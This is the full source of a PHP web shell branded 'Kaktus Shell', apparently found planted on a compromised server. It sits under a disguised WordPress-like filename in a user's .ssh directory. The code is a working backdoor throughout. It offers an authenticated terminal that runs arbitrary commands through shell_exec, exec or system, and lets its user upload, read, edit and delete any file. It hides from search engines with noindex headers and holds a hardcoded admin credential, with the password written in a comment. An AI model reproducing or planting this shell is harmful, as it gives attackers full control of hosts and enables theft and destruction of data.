PK
| ADDRLIN : /home/carfac/.ssh/ |
|
|
| Current File : /home/carfac/.ssh/wp-links-opmI.php |
<?php
/**
* Kaktus Shell - Blue Advanced Shell & File Manager (single file)
* FIXED: Terminal AJAX now works reliably.
*/
// Suppress all warnings/errors in AJAX mode to keep JSON clean
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') {
error_reporting(0);
ini_set('display_errors', 0);
}
if (!function_exists('is_fn_usable')) {
function is_fn_usable($fn) {
if (!function_exists($fn)) return false;
$disabled = (string) @ini_get('disable_functions');
$suhosin = (string) @ini_get('suhosin.executor.func.blacklist');
$blocked = array();
if ($disabled !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $disabled)));
if ($suhosin !== '') $blocked = array_merge($blocked, array_map('trim', explode(',', $suhosin)));
if (!empty($blocked)) {
$blocked = array_filter(array_map('strtolower', $blocked));
if (in_array(strtolower($fn), $blocked, true)) return false;
}
return true;
}
}
date_default_timezone_set(@date_default_timezone_get() ? @date_default_timezone_get() : 'UTC');
session_start();
if (empty($_SESSION['csrf'])) {
$_SESSION['csrf'] = bin2hex(biru_random_bytes(16));
}
/* ---------- Security Headers ---------- */
header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, noimageindex', true);
header('Referrer-Policy: no-referrer');
header('X-Frame-Options: SAMEORIGIN');
header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
header('X-Content-Type-Options: nosniff');
/* ---------- Auth ---------- */
define('AUTH_USER', 'admin');
define('AUTH_PASS_HASH', '$2a$12$BBaLHa.cGOJZR9697oj3auaNFtGk04W6vbsr8mqV9cwprwoPZM4SW'); // pass : n0t
/* ---------- Utility & Polyfills ---------- */
function h($s){ return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8'); }
if (!function_exists('je')) {
function je($v) {
if (function_exists('json_encode')) return json_encode($v);
if (is_bool($v)) return $v ? 'true' : 'false';
if (is_numeric($v)) return (string)$v;
if ($v === null) return 'null';
if (is_array($v) || is_object($v)) {
$parts = array();
$is_list = (is_array($v) && array_keys($v) === range(0, count($v) - 1));
foreach ($v as $key => $val) {
$parts[] = $is_list ? je($val) : '"'.h($key).'":'.je($val);
}
return $is_list ? '['.implode(',', $parts).']' : '{'.implode(',', $parts).'}';
}
return '"'.str_replace(array("\\","\"","\r","\n"), array("\\\\","\\\"","\\r","\\n"), (string)$v).'"';
}
}
function biru_random_bytes($len){
if (is_fn_usable('random_bytes')) return random_bytes($len);
$out = ''; for ($i = 0; $i < $len; $i++) $out .= chr(mt_rand(0, 255));
return $out;
}
function humanSize($b){
$u = array('B','KB','MB','GB','TB'); $i = 0;
while ($b >= 1024 && $i < count($u)-1){ $b/=1024; $i++; }
return ($i ? number_format($b,2) : (string)$b) . ' ' . $u[$i];
}
function permsToString($f){
$p = @fileperms($f); if ($p === false) return '??????????';
$t = ($p & 0x4000) ? 'd' : (($p & 0xA000) ? 'l' : '-');
$s = (($p & 0x0100) ? 'r' : '-') . (($p & 0x0080) ? 'w' : '-') . (($p & 0x0040) ? 'x' : '-');
$s .= (($p & 0x0020) ? 'r' : '-') . (($p & 0x0010) ? 'w' : '-') . (($p & 0x0008) ? 'x' : '-');
$s .= (($p & 0x0004) ? 'r' : '-') . (($p & 0x0002) ? 'w' : '-') . (($p & 0x0001) ? 'x' : '-');
return $t.$s;
}
function isTextFile($p){
if (is_dir($p)) return false;
$ext = strtolower(pathinfo((string)$p, PATHINFO_EXTENSION));
$allowed = array('txt','md','json','js','css','php','html','ini','xml','sql','env','py','sh');
return in_array($ext, $allowed, true);
}
function safeJoin($base,$child){
$child = str_replace(array("\0", ".."), '', $child);
return rtrim($base, DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$child;
}
function listDirEntries($dir){
$h = @opendir($dir); if ($h===false) return array();
$items=array(); while(false!==($e=readdir($h))){ $items[]=$e; }
closedir($h); return $items;
}
function rrmdir($p){
if (is_file($p) || is_link($p)) return @unlink($p);
$h = @opendir($p); if(!$h) return false;
while(false!==($v=readdir($h))){ if($v==='.'||$v==='..') continue; rrmdir(safeJoin($p,$v)); }
closedir($h); return @rmdir($p);
}
function tryWriteFromTmp($tmp,$dest){
if(@move_uploaded_file($tmp,$dest) || @rename($tmp,$dest) || @copy($tmp,$dest)) return array(true, null);
return array(false, "Write failed");
}
function extractArchive($archivePath, $destPath) {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive;
if ($zip->open($archivePath) === TRUE) {
$zip->extractTo($destPath);
$zip->close();
@unlink($archivePath);
return array(true, "Zip extracted");
}
}
return array(false, "Extractor not available");
}
function breadcrumbs($path){
$path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
$parts = array_values(array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'));
$out = array();
$acc = (DIRECTORY_SEPARATOR === '\\') ? '' : DIRECTORY_SEPARATOR;
if (DIRECTORY_SEPARATOR === '\\' && preg_match('~^[A-Z]:~i', $path)) {
$drive = substr($path, 0, 2); $acc = $drive.'\\'; $out[] = array($drive, $acc);
} else { $out[] = array('root', DIRECTORY_SEPARATOR); }
foreach($parts as $p){
if (preg_match('~^[A-Z]:$~i', $p)) continue;
$acc = rtrim($acc, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $p;
$out[] = array($p, $acc);
}
return $out;
}
function ensureCsrf(){
if($_SERVER['REQUEST_METHOD']==='POST'){
if (!isset($_POST['csrf']) || $_POST['csrf'] !== $_SESSION['csrf']) {
http_response_code(403); exit("CSRF Invalid");
}
}
}
/* ---------- ACTIONS: AJAX Terminal Handler (must come before any output) ---------- */
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest') {
header('Content-Type: application/json');
// Clear any previous output buffers
while (ob_get_level()) ob_end_clean();
$response = array('error' => 'Unknown error');
if (!isset($_SESSION['auth'])) {
$response = array('error' => 'Unauthorized');
} elseif ($_SERVER['REQUEST_METHOD'] !== 'POST') {
$response = array('error' => 'Invalid request method');
} elseif (!isset($_POST['csrf']) || $_POST['csrf'] !== $_SESSION['csrf']) {
$response = array('error' => 'CSRF token mismatch');
} elseif (!isset($_POST['cmd'])) {
$response = array('error' => 'No command provided');
} else {
$cmd = $_POST['cmd'];
$output = '';
// Try shell_exec first
if (function_exists('shell_exec')) {
$output = @shell_exec($cmd . ' 2>&1');
if ($output === null) $output = '';
}
// Fallback to exec
elseif (function_exists('exec')) {
exec($cmd . ' 2>&1', $output_lines, $ret);
$output = implode("\n", $output_lines);
}
// Fallback to system
elseif (function_exists('system')) {
ob_start();
@system($cmd . ' 2>&1');
$output = ob_get_clean();
}
else {
$output = 'ERROR: No command execution function available (shell_exec, exec, system all disabled)';
}
$response = array('output' => (string)$output);
}
echo json_encode($response);
exit;
}
/* ---------- Normal (non-AJAX) request handling ---------- */
if (!isset($_SESSION['auth'])) {
if (isset($_GET['a']) && $_GET['a'] === 'login' && isset($_POST['user'])) {
if ($_POST['user'] === AUTH_USER && password_verify($_POST['pass'], AUTH_PASS_HASH)) {
$_SESSION['auth'] = true; header("Location: ?"); exit;
}
}
// Render Login Page
echo '<body style="background:#0b1220;color:#fff;display:flex;height:100vh;align-items:center;justify-content:center;font-family:sans-serif;"><form method="POST" action="?a=login" style="background:#111827;padding:2rem;border-radius:12px;border:1px solid #374151;"><h3>kaktus LOGIN</h3><input name="user" placeholder="User" style="display:block;margin-bottom:10px;padding:8px;width:200px;"><input name="pass" type="password" placeholder="Pass" style="display:block;margin-bottom:10px;padding:8px;width:200px;"><button type="submit" style="width:100%;padding:8px;background:#3b82f6;color:#fff;border:none;border-radius:4px;cursor:pointer;">Login</button></form></body>';
exit;
}
$initial_script_dir = realpath(getcwd());
$requested_path = isset($_GET['d']) ? (string)$_GET['d'] : '';
$current_path = (realpath($requested_path) && is_dir(realpath($requested_path))) ? realpath($requested_path) : $initial_script_dir;
$msg = ''; $cmd_out = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
ensureCsrf();
$a = isset($_GET['a']) ? $_GET['a'] : '';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'] . ' 2>&1';
$cmd_out = h(shell_exec($cmd));
}
if ($a === 'upload' && isset($_FILES['file'])) {
$dest = safeJoin($current_path, $_FILES['file']['name']);
list($ok, $err) = tryWriteFromTmp($_FILES['file']['tmp_name'], $dest);
$msg = $ok ? "Uploaded: ".$_FILES['file']['name'] : "Error: $err";
}
if ($a === 'save_file' && isset($_POST['target_file'])) {
if (@file_put_contents($_POST['target_file'], $_POST['file_content']) !== false) {
$msg = "File saved!";
}
}
}
if (isset($_GET['a']) && $_GET['a'] === 'del' && isset($_GET['path'])) {
if (rrmdir($_GET['path'])) $msg = "Deleted!";
}
if (isset($_GET['a']) && $_GET['a'] === 'edit_file' && isset($_GET['path'])) {
header('Content-Type: text/plain');
echo @file_get_contents($_GET['path']);
exit;
}
if (isset($_GET['a']) && $_GET['a'] === 'logout') { session_destroy(); header("Location: ?"); exit; }
/* ---------- UI Icons (same as before) ---------- */
function svgIcon($name, $class='w-5 h-5 text-slate-400'){
$icons = array(
'folder'=>'<svg class="'.$class.'" fill="currentColor" viewBox="0 0 24 24"><path d="M10 4l2 2h6a2 2 0 012 2v1H4V6a2 2 0 012-2h4z" opacity=".3"/><path d="M3 9h18v9a2 2 0 01-2 2H5a2 2 0 01-2-2V9z"/></svg>',
'file'=>'<svg class="'.$class.'" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24"><path d="M13 2H6a2 2 0 00-2 2v16a2 2 0 002 2h12a2 2 0 002-2V9z"/><polyline points="13 2 13 9 20 9"/></svg>',
'trash'=>'<svg class="'.$class.' text-red-500" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24"><polyline points="3 6 5 6 21 6"/><path d="M19 6v14a2 2 0 01-2 2H7a2 2 0 01-2-2V6m3 0V4a2 2 0 012-2h4a2 2 0 012 2v2"/></svg>',
'edit'=>'<svg class="'.$class.' text-green-500" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24"><path d="M11 4H4a2 2 0 00-2 2v14a2 2 0 002 2h14a2 2 0 002-2v-7M18.5 2.5a2.121 2.121 0 013 3L12 15l-4 1 1-4 9.5-9.5z"/></svg>'
);
return isset($icons[$name]) ? $icons[$name] : '';
}
?>
<!doctype html>
<html lang="en" class="dark">
<head>
<meta charset="utf-8">
<title>Kaktus BLUE SHELL</title>
<script src="https://cdn.tailwindcss.com"></script>
<style>
body { background: #0b1220; color: #e5e7eb; font-family: 'Ubuntu', sans-serif; }
.card { background: rgba(15,23,42,0.8); border: 1px solid rgba(148,163,184,0.1); backdrop-filter: blur(10px); }
.terminal-input:focus { outline: none; }
.terminal-output { max-height: 400px; overflow-y: auto; }
</style>
</head>
<body class="flex min-h-screen">
<div class="w-64 bg-gray-900/80 border-r border-gray-800 p-6 flex flex-col justify-between">
<div>
<h1 class="text-2xl font-bold text-blue-400 mb-8">Kaktus Web Shell</h1>
<nav class="space-y-4">
<a href="?d=<?= urlencode($initial_script_dir) ?>" class="block hover:text-blue-300">Home</a>
<a href="#shell" class="block hover:text-blue-300">Terminal</a>
</nav>
</div>
<a href="?a=logout" class="text-red-500 font-bold">LOGOUT</a>
</div>
<div class="flex-grow p-8 overflow-auto">
<?php if($msg): ?><div class="bg-blue-600/20 border border-blue-500 p-3 mb-4 rounded"><?= h($msg) ?></div><?php endif; ?>
<div class="flex gap-2 text-sm mb-6 bg-gray-800/40 p-3 rounded-lg">
<?php foreach(breadcrumbs($current_path) as $bc): ?>
<a href="?d=<?= urlencode($bc[1]) ?>" class="text-blue-400 hover:underline"><?= h($bc[0]) ?></a> <span class="text-gray-600">/</span>
<?php endforeach; ?>
</div>
<div class="card p-6 rounded-xl mb-8">
<div class="flex justify-between items-center mb-4">
<h3 class="text-lg font-bold">File Manager</h3>
<form action="?d=<?= urlencode($current_path) ?>&a=upload" method="POST" enctype="multipart/form-data" class="flex gap-2">
<input type="hidden" name="csrf" value="<?= $_SESSION['csrf'] ?>">
<input type="file" name="file" class="text-xs">
<button class="bg-blue-600 px-3 py-1 rounded text-xs font-bold">UPLOAD</button>
</form>
</div>
<table class="w-full text-left text-sm">
<thead><tr class="border-b border-gray-800 text-gray-400"><th>Name</th><th>Size</th><th class="text-right">Action</th></tr></thead>
<tbody>
<?php
$files = listDirEntries($current_path);
natcasesort($files);
foreach($files as $f): if($f=='.'||$f=='..') continue;
$path = safeJoin($current_path, $f);
$is_dir = is_dir($path);
?>
<tr class="border-b border-gray-800/50 hover:bg-gray-800/30">
<td class="py-3">
<a href="<?= $is_dir ? '?d='.urlencode($path) : '#' ?>" class="flex items-center gap-2 <?= $is_dir ? 'text-amber-400' : 'text-gray-300' ?>">
<?= svgIcon($is_dir ? 'folder' : 'file') ?> <?= h($f) ?>
</a>
</td>
<td class="text-gray-500"><?= $is_dir ? 'DIR' : humanSize(@filesize($path)) ?></td>
<td class="text-right flex justify-end gap-3 py-3">
<?php if(!$is_dir && isTextFile($path)): ?>
<button onclick="openEditor('<?= h($path) ?>')" title="Edit"><?= svgIcon('edit') ?></button>
<?php endif; ?>
<a href="?d=<?= urlencode($current_path) ?>&a=del&path=<?= urlencode($path) ?>" onclick="return confirm('Delete?')"><?= svgIcon('trash') ?></a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<!-- TERMINAL SECTION - FIXED -->
<div id="shell" class="card p-6 rounded-xl">
<h3 class="text-lg font-bold mb-4">Interactive Terminal</h3>
<div id="terminal-output" class="terminal-output bg-black/70 rounded p-3 font-mono text-sm text-green-400 mb-3" style="height: 300px; overflow-y: auto;">
<div>>_ Terminal ready. Type command below.</div>
</div>
<form id="terminal-form" class="flex gap-2">
<input type="hidden" name="csrf" id="csrf-token" value="<?= $_SESSION['csrf'] ?>">
<span class="text-green-400 font-mono">$</span>
<input type="text" name="cmd" id="terminal-cmd" class="terminal-input flex-grow bg-transparent border-none text-green-400 font-mono focus:outline-none" autocomplete="off" autofocus>
<button type="submit" class="bg-blue-600 px-3 py-1 rounded text-xs">Run</button>
<button type="button" id="clear-terminal" class="bg-gray-700 px-3 py-1 rounded text-xs">Clear</button>
</form>
<div class="text-xs text-gray-500 mt-2">Tip: Use standard commands (ls, pwd, whoami, etc.)</div>
</div>
</div>
<div id="editorModal" class="fixed inset-0 bg-black/80 hidden flex items-center justify-center p-8">
<div class="card w-full max-w-4xl h-full flex flex-col p-6 rounded-2xl">
<h3 id="editTitle" class="mb-4 font-bold text-blue-400">Editor</h3>
<form action="?d=<?= urlencode($current_path) ?>&a=save_file" method="POST" class="flex-grow flex flex-col">
<input type="hidden" name="csrf" value="<?= $_SESSION['csrf'] ?>">
<input type="hidden" name="target_file" id="target_file">
<textarea name="file_content" id="file_content" class="w-full flex-grow bg-gray-900 border border-gray-700 p-4 font-mono text-sm rounded mb-4"></textarea>
<div class="flex justify-end gap-4">
<button type="button" onclick="closeEditor()" class="px-6 py-2 bg-gray-700 rounded-lg">Cancel</button>
<button type="submit" class="px-6 py-2 bg-blue-600 rounded-lg font-bold">SAVE CHANGES</button>
</div>
</form>
</div>
</div>
<script>
// Terminal AJAX handling with better error management
const termOutput = document.getElementById('terminal-output');
const termForm = document.getElementById('terminal-form');
const termCmd = document.getElementById('terminal-cmd');
const csrfToken = document.getElementById('csrf-token').value;
function appendToTerminal(text, isError = false) {
const line = document.createElement('div');
line.className = 'mb-1';
line.style.color = isError ? '#f87171' : '#4ade80';
line.textContent = text;
termOutput.appendChild(line);
termOutput.scrollTop = termOutput.scrollHeight;
}
termForm.addEventListener('submit', async (e) => {
e.preventDefault();
const cmd = termCmd.value.trim();
if (cmd === '') return;
appendToTerminal(`$ ${cmd}`);
termCmd.value = '';
termCmd.focus();
try {
const formData = new URLSearchParams();
formData.append('csrf', csrfToken);
formData.append('cmd', cmd);
const response = await fetch(window.location.href, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest'
},
body: formData.toString()
});
// Check if response is OK
if (!response.ok) {
appendToTerminal(`HTTP Error: ${response.status} ${response.statusText}`, true);
return;
}
const text = await response.text();
let data;
try {
data = JSON.parse(text);
} catch (jsonError) {
console.error('Raw response:', text);
appendToTerminal(`Server returned invalid JSON. Raw response (first 200 chars): ${text.substring(0,200)}`, true);
return;
}
if (data.error) {
appendToTerminal(`Error: ${data.error}`, true);
} else if (data.output !== undefined) {
const output = data.output.trim();
if (output) {
output.split('\n').forEach(line => appendToTerminal(line));
} else {
appendToTerminal('(no output)');
}
} else {
appendToTerminal('Unexpected response format', true);
}
} catch (err) {
appendToTerminal(`Request failed: ${err.message}`, true);
}
appendToTerminal(''); // blank line
});
document.getElementById('clear-terminal').addEventListener('click', () => {
termOutput.innerHTML = '<div>>_ Terminal cleared.</div>';
});
function openEditor(path) {
document.getElementById('target_file').value = path;
document.getElementById('editTitle').innerText = "Editing: " + path.split('/').pop();
fetch('?a=edit_file&path=' + encodeURIComponent(path))
.then(r => r.text())
.then(data => {
document.getElementById('file_content').value = data;
document.getElementById('editorModal').classList.remove('hidden');
})
.catch(err => alert('Failed to load file: ' + err.message));
}
function closeEditor() { document.getElementById('editorModal').classList.add('hidden'); }
</script>
</body>
</html>
PK 99